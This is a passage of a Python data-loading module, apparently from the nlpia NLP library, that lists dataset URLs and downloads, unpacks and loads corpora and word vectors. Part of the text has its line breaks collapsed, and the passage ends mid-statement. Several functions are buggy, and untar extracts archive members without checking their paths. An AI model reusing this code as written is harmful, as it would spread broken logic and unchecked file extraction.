from nlpia.constants import tqdm, no_tqdm
from nlpia.futil import mkdir_p, path_status, find_files  # from pugnlp.futil
from nlpia.futil import find_filepath, expand_filepath, normalize_filepath, normalize_ext, ensure_open
from nlpia.futil import read_json, read_text, read_csv
from nlpia.web import get_url_filemeta
from nlpia.web import dropbox_basename, get_url_title, try_parse_url  # noqa (not used)
from nlpia.web import requests_get
import ipdb

_parse = None  # placeholder for SpaCy parser + language model
np = pd.np
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
# logging.config.dictConfig(LOGGING_CONFIG)
# # doesn't display line number, etc
# if os.environ.get('DEBUG'):
#     logging.basicConfig(level=logging.DEBUG)

# SMALLDATA_URL = 'http://totalgood.org/static/data'

W2V_FILES = [
    'GoogleNews-vectors-negative300.bin.gz',
    'glove.6B.zip',
    'glove.twitter.27B.zip',
    'glove.42B.300d.zip',
    'glove.840B.300d.zip',
]
# You probably want to `rm nlpia/src/nlpia/data/bigdata_info.csv` if you modify any of these
# so they don't overwrite what you hardcode within loaders.py here:
ZIP_FILES = {
    'GoogleNews-vectors-negative300.bin.gz': None,
    'glove.6B.zip': ['glove.6B.50d.w2v.txt', 'glove.6B.100d.w2v.txt', 'glove.6B.200d.w2v.txt', 'glove.6B.300d.w2v.txt'],
    'glove.twitter.27B.zip': None,
    'glove.42B.300d.zip': None,
    'glove.840B.300d.zip': None,
}
ZIP_PATHS = [[os.path.join(BIGDATA_PATH, fn) for fn in ZIP_FILES[k]] if ZIP_FILES[k] else k
             for k in ZIP_FILES.keys()]

harry_docs = ["The faster Harry got to the store, the faster and faster Harry would get home.",
              "Harry is hairy and faster than Jill.",
              "Jill is not as hairy as Harry."]


def load_imdb_df(dirpath=os.path.join(BIGDATA_PATH, 'aclImdb'), subdirectories=(('train', 'test'), ('pos', 'neg', 'unsup'))):
    """ Walk directory tree starting at `path` to compile a DataFrame of movie review text labeled with their 1-10 star ratings

    Returns:
        DataFrame:
            columns=['url', 'rating', 'text'], index=MultiIndex(['train_test', 'pos_neg_unsup', 'id'])

    TODO: Make this more robust/general by allowing the subdirectories to be None and find all the subdirs containing txt files

    >> imdb_df().head()
                                                          url  rating                                               text
    index0 index1 index2
    train  pos    0       http://www.imdb.com/title/tt0453418       9  Bromwell High is a cartoon comedy. It ran at t...
                  1       http://www.imdb.com/title/tt0210075       7  If you like adult comedy cartoons, like South ...
                  2       http://www.imdb.com/title/tt0085688       9  Bromwell High is nothing short of brilliant. E...
                  3       http://www.imdb.com/title/tt0033022      10  "All the world's a stage and its people actors...
                  4       http://www.imdb.com/title/tt0043137       8  FUTZ is the only show preserved from the exper...
    """
    dfs = {}
    for subdirs in tqdm(list(product(*subdirectories))):
        urlspath = os.path.join(dirpath, subdirs[0], 'urls_{}.txt'.format(subdirs[1]))
        if not os.path.isfile(urlspath):
            if subdirs != ('test', 'unsup'):  # test/ dir doesn't usually have an unsup subdirectory
                log.warning('Unable to find expected IMDB review list of URLs: {}'.format(urlspath))
            continue
        df = pd.read_csv(urlspath, header=None, names=['url'])
        # df.index.name = 'id'
        df['url'] = series_strip(df.url, endswith='/usercomments')

        textsdir = os.path.join(dirpath, subdirs[0], subdirs[1])
        if not os.path.isdir(textsdir):
            log.warning('Unable to find expected IMDB review text subdirectory: {}'.format(textsdir))
            continue
        filenames = [fn for fn in os.listdir(textsdir) if fn.lower().endswith('.txt')]
        df['index0'] = subdirs[0]  # TODO: column names more generic so will work on other datasets
        df['index1'] = subdirs[1]
        df['index2'] = np.array([int(fn[:-4].split('_')[0]) for fn in filenames])
        df['rating'] = np.array([int(fn[:-4].split('_')[1]) for fn in filenames])
        texts = []
        for fn in filenames:
            with ensure_open(os.path.join(textsdir, fn)) as f:
                texts.append(f.read())
        df['text'] = np.array(texts)
        del texts
        df.set_index('index0 index1 index2'.split(), inplace=True)
        df.sort_index(inplace=True)
        dfs[subdirs] = df
    return pd.concat(dfs.values())


def load_glove(filepath, batch_size=1000, limit=None, verbose=True):
    r""" Load a pretrained GloVE word vector model

    First header line of GloVE text file should look like:
        400000 50\n

    First vector of GloVE text file should look like:
        the .12 .22 .32 .42 ...
.42 >>> wv = load_glove(os.path.join(BIGDATA_PATH, 'glove_test.txt')) >>> wv.most_similar('and')[:3] [(',', 0.92...), ('.', 0.91...), ('of', 0.86...)] """ num_dim = isglove(filepath) tqdm_prog = tqdm if verbose else no_tqdm wv = KeyedVectors(num_dim) if limit: vocab_size = int(limit) else: with ensure_open(filepath) as fin: for i, line in enumerate(fin): pass vocab_size = i + 1 wv.vectors = np.zeros((vocab_size, num_dim), REAL) with ensure_open(filepath) as fin: batch, words = [], [] for i, line in enumerate(tqdm_prog(fin, total=vocab_size)): line = line.split() word = line[0] vector = np.array(line[1:]).astype(float) # words.append(word) # batch.append(vector) wv.index2word.append(word) wv.vocab[word] = Vocab(index=i, count=vocab_size - i) wv.vectors[i] = vector if len(words) >= batch_size: # wv[words] = np.array(batch) batch, words = [], [] if i >= vocab_size - 1: break if words: wv[words] = np.array(batch) return wv def load_glove_df(filepath, **kwargs): """ Load a GloVE-format text file into a dataframe >>> df = load_glove_df(os.path.join(BIGDATA_PATH, 'glove_test.txt')) >>> df.index[:3] Index(['the', ',', '.'], dtype='object', name=0) >>> df.iloc[0][:3] 1 0.41800 2 0.24968 3 -0.41242 Name: the, dtype: float64 """ pdkwargs = dict(index_col=0, header=None, sep=r'\s', skiprows=[0], verbose=False, engine='python') pdkwargs.update(kwargs) return pd.read_csv(filepath, **pdkwargs) # def load_glove_format(filepath): # """ https://stackoverflow.com/questions/37793118/load-pretrained-glove-vectors-in-python#45894001 """ # # glove_input_file = os.path.join(BIGDATA_PATH, filepath) # word2vec_output_file = os.path.join(BIGDATA_PATH, filepath.split(os.path.sep)[-1][:-4] + '.w2v.txt') # if not os.path.isfile(word2vec_output_file): # TODO: also check file size # glove2word2vec(glove_input_file=filepath, word2vec_output_file=word2vec_output_file) # return KeyedVectors.load_word2vec_format(word2vec_output_file) def get_en2fr(url='http://www.manythings.org/anki/fra-eng.zip'): """ Download and parse English->French translation dataset used in Keras seq2seq example """ download_unzip(url) return pd.read_table(url, compression='zip', header=None, skip_blank_lines=True, sep='\t', skiprows=0, names='en fr'.split()) def load_anki_df(language='deu'): """ Load into a DataFrame statements in one language along with their translation into English >>> df = get_data('zsm') >>> list(list(df.columns)[:2]) ['eng', 'zsm'] >>> len(df) > 100 True >> get_data('zsm').head(2) eng zsm 0 Are you new? Awak baru? 1 Forget it. Lupakanlah. 
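
    A further usage sketch (editor's addition, not a doctest; it assumes the
    'deu-eng' Anki archive has already been downloaded and unzipped into
    BIGDATA_PATH, e.g. via get_data('deu')):

    >> df_de = load_anki_df('deu')
    >> list(df_de.columns[:2])
    ['eng', 'deu']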
""" if os.path.isfile(language): filepath = language lang = re.search('[a-z]{3}-eng/', filepath).group()[:3].lower() else: lang = (language or 'deu').lower()[:3] filepath = os.path.join(BIGDATA_PATH, '{}-eng'.format(lang), '{}.txt'.format(lang)) df = pd.read_table(filepath, skiprows=1, header=None) for i, newc in enumerate(['eng', lang, 'license']): df.columns = [newc if str(c).lower().strip().startswith(newc) else c for c in df.columns] if newc not in df.columns and i < len(df.columns): columns = list(df.columns) columns[i] = newc df.columns = columns return df BIG_URLS = { 'w2v': ( 'https://www.dropbox.com/s/965dir4dje0hfi4/GoogleNews-vectors-negative300.bin.gz?dl=1', 1647046227, 'GoogleNews-vectors-negative300.bin.gz', KeyedVectors.load_word2vec_format, {'binary': True}, ), 'words_google_news': ( 'https://www.dropbox.com/s/9pm0js9qdjr04jy/words_google_news.txt.gz?dl=1', 3015517, ), 'glove_twitter': ( 'https://nlp.stanford.edu/data/glove.twitter.27B.zip', 1520408563, ), 'glove_small': ( 'https://nlp.stanford.edu/data/glove.6B.zip', 862182613, os.path.join('glove.6B', 'glove.6B.50d.txt'), load_glove, ), 'glove_large': ( 'https://nlp.stanford.edu/data/glove.840B.300d.zip', 2176768927, ), 'glove_medium': ( 'https://nlp.stanford.edu/data/glove.42B.300d.zip', 1877800501, ), 'slang': ( 'https://www.dropbox.com/s/43c22018fbfzypd/slang.csv.gz?dl=1', 117633024, ), 'tweets': ( 'https://www.dropbox.com/s/5gpb43c494mc8p0/tweets.csv.gz?dl=1', 311725313, ), 'crimedata': ( 'https://www.dropbox.com/s/mg4yokpifu3n6u5/crimedata.csv.gz?dl=1', 2126689, ), 'cities': ( 'https://www.dropbox.com/s/tcri5eyzpabhnyy/cities.csv.gz?dl=1', 8396891, ), 'cities_us_wordvectors': ( 'https://www.dropbox.com/s/7ujezmo03b637q3/cities_us_wordvectors.csv.gz?dl=1', 8451128, ), 'dialog': ( 'https://www.dropbox.com/s/5543bkihxflzry9/dialog.csv.gz?dl=1', 4415234, ), 'cornellmovies': ( 'http://www.cs.cornell.edu/~cristian/data/cornell_movie_dialogs_corpus.zip', 9916637, 'cornell_movie_dialogs_corpus', ), 'save_dialog_tweets': ( 'https://www.dropbox.com/s/tlrr9bm45uzm9yl/save_dialog_tweets.txt.gz?dl=1', 4517000, ), 'lsa_tweets': ( 'https://www.dropbox.com/s/rpjt0d060t4n1mr/lsa_tweets_5589798_2003588x200.tar.gz?dl=1', 3112841563, ), 'lsa_tweets_pickle': ( 'https://www.dropbox.com/s/7k0nvl2dx3hsbqp/lsa_tweets_5589798_2003588x200.pkl.projection.u.npy?dl=1', 2900000000, ), 'ubuntu_dialog_1500k': ( 'https://www.dropbox.com/s/krvi79fbsryytc2/ubuntu_dialog_1500k.csv.gz?dl=1', 296098788, ), 'ubuntu_dialog_test': ( 'https://www.dropbox.com/s/47mqbx0vgynvnnj/ubuntu_dialog_test.csv.gz?dl=1', 31273, ), 'imdb': ( 'https://www.dropbox.com/s/yviic64qv84x73j/aclImdb_v1.tar.gz?dl=1', 84125825, 'aclImdb', # directory for extractall load_imdb_df, # postprocessor to combine text files into a single DataFrame ), 'imdb_test': ( 'https://www.dropbox.com/s/cpgrf3udzkbmvuu/aclImdb_test.tar.gz?dl=1', 10858, 'aclImdb_test', # directory for extractall load_imdb_df, ), 'alice': ( # 'https://www.dropbox.com/s/py952zad3mntyvp/aiml-en-us-foundation-alice.v1-9.zip?dl=1', 'https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/' \ 'aiml-en-us-foundation-alice/aiml-en-us-foundation-alice.v1-9.zip', 8249482, ), # BRFSS annual mental health survey 'cdc': ( 'https://www.cdc.gov/brfss/annual_data/2016/files/LLCP2016ASC.zip', 52284490, ), } for yr in range(2011, 2017): BIG_URLS['cdc' + str(yr)[-2:]] = ('https://www.cdc.gov/brfss/annual_data/{yr}/files/LLCP{yr}ASC.zip'.format(yr=yr), None) # Aliases for bigurls. 
Canonical name given on line by itself. BIG_URLS['cornell'] = BIG_URLS['cornellmoviedialog'] = BIG_URLS['cornellmoviedialogs'] = BIG_URLS['cornell_movie_dialog'] = \ BIG_URLS['cornell_movie_dialogs'] = BIG_URLS['cornell_movie_dialog_corpus'] = BIG_URLS['cornell_movie_dialogs_corpus'] = \ BIG_URLS['cornellmovies'] BIG_URLS['word2vec'] = BIG_URLS['wv'] = \ BIG_URLS['w2v'] BIG_URLS['glove'] = BIG_URLS['glovesm'] = BIG_URLS['glove-sm'] = BIG_URLS['glove_sm'] = BIG_URLS['glove-small'] = \ BIG_URLS['glove_small'] BIG_URLS['ubuntu'] = BIG_URLS['ubuntu_dialog'] = \ BIG_URLS['ubuntu_dialog_1500k'] BIG_URLS['glovelg'] = BIG_URLS['glove_lg'] = BIG_URLS['glove-lg'] = BIG_URLS['glove-large'] = \ BIG_URLS['glove_large'] BIG_URLS['glovemed'] = BIG_URLS['glove_med'] = BIG_URLS['glove-med'] = BIG_URLS['glove-medium'] = \ BIG_URLS['glove_medium'] def generate_big_urls_glove(bigurls=None): """ Generate a dictionary of URLs for various combinations of GloVe training set sizes and dimensionality """ bigurls = bigurls or {} for num_dim in (50, 100, 200, 300): # not all of these dimensionality, and training set size combinations were trained by Stanford for suffixes, num_words in zip( ('sm -sm _sm -small _small'.split(), 'med -med _med -medium _medium'.split(), 'lg -lg _lg -large _large'.split()), (6, 42, 840) ): for suf in suffixes[:-1]: name = 'glove' + suf + str(num_dim) dirname = 'glove.{num_words}B'.format(num_words=num_words) # glove.42B.300d.w2v.txt filename = dirname + '.{num_dim}d.w2v.txt'.format(num_dim=num_dim) # seed the alias named URL with the URL for that training set size's canonical name bigurl_tuple = BIG_URLS['glove' + suffixes[-1]] bigurls[name] = list(bigurl_tuple[:2]) bigurls[name].append(os.path.join(dirname, filename)) bigurls[name].append(load_glove) bigurls[name] = tuple(bigurls[name]) return bigurls BIG_URLS.update(generate_big_urls_glove()) ANKI_LANGUAGES = 'afr arq ara aze eus bel ben ber bul yue cat cbk cmn chv hrv ces dan nld est fin fra glg kat ' \ 'deu ell heb hin hun isl ind ita jpn kha khm kor lvs lit nds mkd zsm mal mri mar max nob pes ' \ 'pol por ron rus srp slk slv spa swe tgl tam tat tha tur ukr urd uig vie'.split() ANKI_LANGUAGE_SYNONYMS = list(zip('fre esp ger french spanish german turkish turkey dut dutch'.split(), 'fra spa deu fra spa deu tur tur dan dan'.split())) LANG2ANKI = dict((lang[:2], lang) for lang in ANKI_LANGUAGES) """ >>> len(ANKI_LANGUAGES) - len(LANG2ANKI) 9 """ ENGLISHES = 'eng usa us bri british american aus australian'.split() for lang in ANKI_LANGUAGES: for eng in ENGLISHES: BIG_URLS[lang] = ('http://www.manythings.org/anki/{}-eng.zip'.format(lang), 1000, '{}-{}'.format(lang, eng), load_anki_df) BIG_URLS[lang + '-eng'] = ('http://www.manythings.org/anki/{}-eng.zip'.format(lang), 1000, '{}-{}'.format(lang, eng), load_anki_df) for syn, lang in ANKI_LANGUAGE_SYNONYMS: BIG_URLS[syn] = BIG_URLS[lang] for eng in ENGLISHES: BIG_URLS[lang + '-' + eng] = BIG_URLS[lang + '-eng'] """ Google N-Gram Viewer meta data is from: * [GOOGLE_NGRAM files](https://storage.googleapis.com/books/ngrams/books/datasetsv2.html) * [GOOGLE_NGRAM data format](https://books.google.com/ngrams/info) """ GOOGLE_NGRAM_URL = 'http://storage.googleapis.com/books/ngrams/books/' GOOGLE_NGRAM_NAMES = '0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o other p pos punctuation q r s t u v w x y z'.split() GOOGLE_NGRAM_FILE = 'googlebooks-eng-all-1gram-20120701-{}.gz' for name in GOOGLE_NGRAM_NAMES: BIG_URLS['1gram_{}'.format(name)] = (GOOGLE_NGRAM_URL + GOOGLE_NGRAM_FILE.format(name), 1000, 
GOOGLE_NGRAM_FILE.format(name), pd.read_table, {'sep': '\t', 'header': None, 'names': 'term_pos year term_freq book_freq'.split()}) try: BIGDATA_INFO = pd.read_csv(BIGDATA_INFO_FILE, header=0) log.warning('Found BIGDATA index in {default} so it will overwrite nlpia.loaders.BIG_URLS !!!'.format( default=BIGDATA_INFO_FILE)) except (IOError, pd.errors.EmptyDataError): BIGDATA_INFO = pd.DataFrame(columns='name url file_size'.split()) log.info('No BIGDATA index found in {default} so copy {latest} to {default} if you want to "freeze" it.'.format( default=BIGDATA_INFO_FILE, latest=BIGDATA_INFO_LATEST)) BIG_URLS.update(dict(zip(BIGDATA_INFO.name, zip(BIGDATA_INFO.url, BIGDATA_INFO.file_size)))) BIGDATA_INFO = pd.DataFrame(list( zip(BIG_URLS.keys(), list(zip(*BIG_URLS.values()))[0], list(zip(*BIG_URLS.values()))[1])), columns='name url file_size'.split()) BIGDATA_INFO.to_csv(BIGDATA_INFO_LATEST) # FIXME: consolidate with DATA_INFO or BIG_URLS DATA_NAMES = { 'pointcloud': os.path.join(DATA_PATH, 'pointcloud.csv.gz'), 'hutto_tweets0': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/tweets_GroundTruth.csv.gz'), 'hutto_tweets': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/tweets_GroundTruth.csv'), 'hutto_nyt': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/nytEditorialSnippets_GroundTruth.csv.gz'), 'hutto_movies': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/movieReviewSnippets_GroundTruth.csv.gz'), 'hutto_products': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/amazonReviewSnippets_GroundTruth.csv.gz'), } # FIXME: put these in BIG_URLS, and test/use them with get_data() DDL_DS_QUESTIONS_URL = 'http://minimum-entropy.districtdatalabs.com/api/questions/?format=json' DDL_DS_ANSWERS_URL = 'http://minimum-entropy.districtdatalabs.com/api/answers/?format=json' # Files to load into local variables like loaders.kite_text loaders.kite_history TEXTS = ['kite_text.txt', 'kite_history.txt'] CSVS = ['mavis-batey-greetings.csv', 'sms-spam.csv'] DATA_INFO = pd.read_csv(DATA_INFO_FILE, header=0) def rename_file(source, dest): """ Rename (mv) file(s) from source to dest >>> from tempfile import mkdtemp >>> tmpdir = mkdtemp(suffix='doctest_rename_file', prefix='tmp') >>> fout = ensure_open(os.path.join(tmpdir, 'fake_data.bin.gz'), 'w') >>> fout.write(b'fake nlpia.loaders.rename_file') 30 >>> fout.close() >>> dest = rename_file(os.path.join(tmpdir, 'fake_data.bin.gz'), os.path.join(tmpdir, 'Fake_Data.bin.gz')) >>> os.path.isfile(os.path.join(tmpdir, 'Fake_Data.bin.gz')) True """ log.debug('nlpia.loaders.rename_file(source={}, dest={})'.format(source, dest)) if not isinstance(source, str): dest = [dest] if isinstance(dest, str) else dest return [rename_file(s, d) for (s, d) in zip_longest(source, dest, fillvalue=[source, dest][int(len(source) > len(dest))])] log.debug('nlpia.loaders.os.rename(source={}, dest={})'.format(source, dest)) if source == dest: return dest os.rename(source, dest) return dest def normalize_ext_rename(filepath): """ normalize file ext like '.tgz' -> '.tar.gz' and '300d.txt' -> '300d.glove.txt' and rename the file >>> pth = os.path.join(DATA_PATH, 'sms_slang_dict.txt') >>> pth == normalize_ext_rename(pth) True """ # log.warning('normalize_ext.filepath=' + str(filepath)) new_file_path = normalize_ext(filepath) # log.warning('download_unzip.new_filepath=' + str(new_file_path)) # FIXME: fails when name is a url filename filepath = rename_file(filepath, new_file_path) log.warning('download_unzip.filepath=' + str(filepath)) return filepath def untar(fname, verbose=True): """ Uunzip and untar a tar.gz file into a subdir of 
    the BIGDATA_PATH directory """
    if fname.lower().endswith(".tar.gz"):
        dirpath = os.path.join(BIGDATA_PATH, os.path.basename(fname)[:-7])
        if os.path.isdir(dirpath):
            return dirpath
        with tarfile.open(fname) as tf:
            members = tf.getmembers()
            for member in tqdm(members, total=len(members)):
                tf.extract(member, path=BIGDATA_PATH)
        dirpath = os.path.join(BIGDATA_PATH, members[0].name)
        if os.path.isdir(dirpath):
            return dirpath
    else:
        log.warning("Not a tar.gz file: {}".format(fname))


def series_rstrip(series, endswith='/usercomments', ignorecase=True):
    """ Strip a suffix str (`endswith` str) from a `df` columns or pd.Series of type str """
    return series_strip(series, startswith=None, endswith=endswith, startsorendswith=None, ignorecase=ignorecase)


def series_lstrip(series, startswith='http://', ignorecase=True):
    """ Strip a prefix str (`startswith` str) from a `df` columns or pd.Series of type str """
    return series_strip(series, startswith=startswith, endswith=None, startsorendswith=None, ignorecase=ignorecase)


def series_strip(series, startswith=None, endswith=None, startsorendswith=None, ignorecase=True):
    """ Strip a suffix/prefix str (`endswith`/`startswith` str) from a `df` columns or pd.Series of type str """
    if ignorecase:
        mask = series.str.lower()
        # only lowercase the affixes that were actually provided (either may be None)
        endswith = endswith.lower() if endswith else endswith
        startswith = startswith.lower() if startswith else startswith
    else:
        mask = series
    if not (startsorendswith or endswith or startswith):
        log.warning('In series_strip(): You must specify endswith, startswith, or startsorendswith string arguments.')
        return series
    if startsorendswith:
        startswith = endswith = startsorendswith
    if endswith:
        mask = mask.str.endswith(endswith)
        series[mask] = series[mask].str[:-len(endswith)]
    if startswith:
        mask = mask.str.startswith(startswith)
        series[mask] = series[mask].str[len(startswith):]
    return series


def endswith_strip(s, endswith='.txt', ignorecase=True):
    """ Strip a suffix from the end of a string

    >>> endswith_strip('http://TotalGood.com', '.COM')
    'http://TotalGood'
    >>> endswith_strip('http://TotalGood.com', endswith='.COM', ignorecase=False)
    'http://TotalGood.com'
    """
    if ignorecase:
        if s.lower().endswith(endswith.lower()):
            return s[:-len(endswith)]
    else:
        if s.endswith(endswith):
            return s[:-len(endswith)]
    return s


def startswith_strip(s, startswith='http://', ignorecase=True):
    """ Strip a prefix from the beginning of a string

    >>> startswith_strip('HTtp://TotalGood.com', 'HTTP://')
    'TotalGood.com'
    >>> startswith_strip('HTtp://TotalGood.com', startswith='HTTP://', ignorecase=False)
    'HTtp://TotalGood.com'
    """
    if ignorecase:
        if s.lower().startswith(startswith.lower()):
            return s[len(startswith):]
    else:
        if s.startswith(startswith):
            return s[len(startswith):]
    return s


def combine_dfs(dfs, index_col='index0 index1 index2'.split()):
    """ Concatenate a dict or sequence of DataFrames into a single DataFrame """
    if isinstance(dfs, dict):
        dfs = list(dfs.values())
    return pd.concat(dfs)  # index_col is accepted for API symmetry but not used yet


def get_longest_table(url='https://www.openoffice.org/dev_docs/source/file_extensions.html', header=0):
    """ Retrieve the HTML tables from a URL and return the longest DataFrame found

    >>> get_longest_table('https://en.wikipedia.org/wiki/List_of_sovereign_states').columns
    Index(['Common and formal names', 'Membership within the UN System[a]',
           'Sovereignty dispute[b]',
           'Further information on status and recognition of sovereignty[d]'],
          dtype='object')
    """
    dfs = pd.read_html(url, header=header)
    return longest_table(dfs)


def get_leet_map():
    r""" Retrieve mapping from English letters to l33t like E => 3 or A => /\ or /-\ or @ """
    df = get_longest_table(
        'https://sites.google.com/site/inhainternetlanguage/different-internet-languages/l33t/list-of-l33ts',
        header=None)
    df =
df.drop(index=0).iloc[:, :2] df.columns = ['eng', 'l33t'] df['l33t'] = df['l33t'].str.split(',') table = [] for i, row in df.iterrows(): for s in row['l33t']: table.append((row['eng'].strip(), s.strip())) table = pd.DataFrame(table, columns=df.columns) leet_path = os.path.join(DATA_PATH, 'l33t.csv') log.info('Saving l33t dictionary (character mapping) to {}'.format(leet_path)) table.to_csv(leet_path) return table def get_netspeak_map(): """ Retrieve mapping from chat/text abbreviations and acronyms like LMK => Let Me Know """ dfs = pd.read_html('https://www.webopedia.com/quick_ref/textmessageabbreviations.asp') df = dfs[0].drop(index=0) df.columns = ['abbrev', 'definition'] csv_path = os.path.join(DATA_PATH, 'netspeak.csv') log.info('Saving netspeak dictionary (word mapping) to {}'.format(csv_path)) df.to_csv(csv_path) return df # more nontabular lists at 'https://simple.wikipedia.org/wiki/Leet def longest_table(dfs): """ Return this single longest DataFrame that among an array/list/tuple of DataFrames Useful for automagically finding the DataFrame you want when using pd.read_html() on a Wikipedia page. """ sorted_indices = sorted((len(df if hasattr(df, '__len__') else []), i) for i, df in enumerate(dfs)) return dfs[sorted_indices[-1][1]] def get_filename_extensions(url='https://tan.sfo2.digitaloceanspaces.com/midata/public/corpora/nlpia/file_extensions.html'): """ Load a DataFrame of filename extensions from the indicated url > df = get_filename_extensions('https://www.webopedia.com/quick_ref/fileextensionsfull.asp') > df = get_filename_extensions('https://www.openoffice.org/dev_docs/source/file_extensions.html') >>> df = get_filename_extensions('https://tan.sfo2.digitaloceanspaces.com/midata/public/corpora/nlpia/file_extensions.html') >>> df.head(2) ext description 0 .a UNIX static library file. 1 .asm Non-UNIX assembler source file. 
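
    A follow-on sketch (editor's addition, not a doctest; `ext2desc` is a
    hypothetical variable name) showing one way the returned table might be
    used as an extension -> description lookup:

    >> ext2desc = dict(zip(df.ext, df.description))
    >> ext2desc['.asm']
    'Non-UNIX assembler source file.'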
""" df = get_longest_table(url) columns = list(df.columns) columns[0] = 'ext' columns[1] = 'description' if len(columns) > 2: columns[2] = 'details' df.columns = columns return df ####################################################################### # Populate some local string variables with text files from DATA_PATH for filename in TEXTS: with ensure_open(os.path.join(DATA_PATH, filename)) as fin: locals()[filename.split('.')[0]] = fin.read() del fin for filename in CSVS: locals()['df_' + filename.split('.')[0].replace('-', '_')] = read_csv( os.path.join(DATA_PATH, filename)) def migrate_big_urls(big_urls=BIG_URLS, inplace=True): r""" Migrate the big_urls table schema/structure from a dict of lists to a dict of dicts >>> big_urls = {'x': (1, 2, 3, "4x"), 'y': ("yme", "cause")} >>> inplace = migrate_big_urls(big_urls=big_urls) >>> inplace {'x': {0: 1, 1: 2, 2: 3, 3: '4x'}, 'y': {0: 'yme', 1: 'cause'}} >>> inplace is big_urls True >>> big_urls = {'x': [1, 2, 3, "4x"], 'y': ["yme", "cause"]} >>> copied = migrate_big_urls(big_urls=big_urls, inplace=False) >>> copied {'x': {0: 1, 1: 2, 2: 3, 3: '4x'}, 'y': {0: 'yme', 1: 'cause'}} >>> copied is big_urls False >>> copied['x'] is big_urls['x'] False >>> 1 is copied['x'][0] is big_urls['x'][0] True """ if not inplace: big_urls = deepcopy(big_urls) for name, meta in big_urls.items(): big_urls[name] = dict(zip(range(len(meta)), meta)) big_urls[name] = dict(zip(range(len(meta)), meta)) # big_urls[name]['filenames'] = [normalize_ext(big_urls)] return big_urls BIG_URLS = migrate_big_urls(BIG_URLS) def normalize_glove(filepath): r""" https://stackoverflow.com/questions/37793118/load-pretrained-glove-vectors-in-python#45894001 """ # FIXME filepath = expand_filepath(filepath) raise NotImplementedError() def unzip(filepath, verbose=True): r""" Unzip GloVE models and convert to word2vec binary models (gensim.KeyedVectors) The only kinds of files that are returned are "*.asc" and "*.txt" and only after renaming. 
""" filepath = expand_filepath(filepath) filename = os.path.basename(filepath) tqdm_prog = tqdm if verbose else no_tqdm z = ZipFile(filepath) unzip_dir = filename.split('.')[0] if filename.split('.')[0] else os.path.splitext(filename)[0] unzip_dir = os.path.join(BIGDATA_PATH, unzip_dir) if not os.path.isdir(unzip_dir) or not len(os.listdir(unzip_dir)) == len(z.filelist): z.extractall(path=unzip_dir) log.info('unzip_dir contains: {}'.format(os.listdir(unzip_dir))) # for f in os.listdir(unzip_dir): # if f.lower().endswith('about.txt'): # os.remove(os.path.join(unzip_dir, f)) for f in tqdm_prog(os.listdir(unzip_dir)): if f[-1] in ' \t\r\n\f': bad_path = os.path.join(unzip_dir, f) log.warning('Stripping whitespace from end of filename: {} -> {}'.format( repr(bad_path), repr(bad_path.rstrip()))) shutil.move(bad_path, bad_path.rstrip()) # rename_file(source=bad_path, dest=bad_path.rstrip()) anki_paths = [os.path.join(unzip_dir, f) for f in os.listdir(unzip_dir) if f.lower()[:3] in ANKI_LANGUAGES and f.lower()[3:] == '.txt'] log.info('anki_paths: {}'.format(anki_paths)) w2v_paths = [os.path.join(BIGDATA_PATH, f[:-4] + '.w2v.txt') for f in os.listdir(unzip_dir) if f.lower().endswith('.txt') and 'glove' in f.lower()] for f, word2vec_output_file in zip(os.listdir(unzip_dir), w2v_paths): glove_input_file = os.path.join(unzip_dir, f) log.info('Attempting to converting GloVE format to Word2vec: {} -> {}'.format( repr(glove_input_file), repr(word2vec_output_file))) try: glove2word2vec(glove_input_file=glove_input_file, word2vec_output_file=word2vec_output_file) except: # noqa log.info('Failed to convert GloVE format to Word2vec: {} -> {}'.format( repr(glove_input_file), repr(word2vec_output_file))) txt_paths = [os.path.join(BIGDATA_PATH, f.lower()[:-4] + '.txt') for f in os.listdir(unzip_dir) if f.lower().endswith('.asc')] for f, txt_file in zip(os.listdir(unzip_dir), txt_paths): if f.lower().endswith('.asc'): input_file = os.path.join(unzip_dir, f) log.info('Renaming .asc file to .txt: {} -> {}'.format( repr(input_file), repr(txt_file))) shutil.move(input_file, txt_file) return anki_paths + txt_paths + w2v_paths def create_big_url(name): """ If name looks like a url, with an http, add an entry for it in BIG_URLS """ # BIG side effect global BIG_URLS filemeta = get_url_filemeta(name) if not filemeta: return None filename = filemeta['filename'] remote_size = filemeta['remote_size'] url = filemeta['url'] name = filename.split('.') name = (name[0] if name[0] not in ('', '.') else name[1]).replace(' ', '-') name = name.lower().strip() BIG_URLS[name] = (url, int(remote_size or -1), filename) return name def get_ftp_filemeta(parsed_url, username='anonymous', password='<EMAIL>'): """ FIXME: Get file size, hostname, path metadata from FTP server using parsed_url (urlparse)""" return dict( url=parsed_url.geturl(), hostname=parsed_url.hostname, path=parsed_url.path, username=(parsed_url.username or username), remote_size=-1, filename=os.path.basename(parsed_url.path)) ftp = ftplib.FTP(parsed_url.hostname) ftp.login(username, password) ftp.cwd(parsed_url.path) ftp.retrbinary("RETR " + filename, open(filename, 'wb').write) ftp.quit() def download_unzip(names=None, normalize_filenames=False, verbose=True): r""" Download CSV or HTML tables listed in `names`, unzip and to DATA_PATH/`names`.csv .txt etc TODO: move to web or data_utils or futils Also normalizes file name extensions (.bin.gz -> .w2v.bin.gz). Uses table in data_info.csv (internal DATA_INFO) to determine URL or file path from dataset name. 
Also looks If names or [names] is a valid URL then download it and create a name from the url in BIG_URLS (not yet pushed to data_info.csv) """ names = [names] if isinstance(names, (str, basestring)) else names # names = names or list(BIG_URLS.keys()) # download them all, if none specified! file_paths = {} for name in names: created = create_big_url(name) name = (created or name).lower().strip() if name in BIG_URLS: filepath = download_name(name, verbose=verbose) if not filepath: continue file_paths[name] = normalize_ext_rename(filepath) log.debug('downloaded name={} to filepath={}'.format(name, file_paths[name])) fplower = file_paths[name].lower() if fplower.endswith('.tar.gz'): log.info('Extracting {}'.format(file_paths[name])) file_paths[name] = untar(file_paths[name], verbose=verbose) log.debug('download_untar.filepaths=' + str(file_paths)) elif file_paths[name].lower().endswith('.zip'): file_paths[name] = unzip(file_paths[name], verbose=verbose) log.debug('download_unzip.filepaths=' + str(file_paths)) else: df = pd.read_html(DATA_INFO['url'][name], **DATA_INFO['downloader_kwargs'][name])[-1] df.columns = clean_columns(df.columns) file_paths[name] = 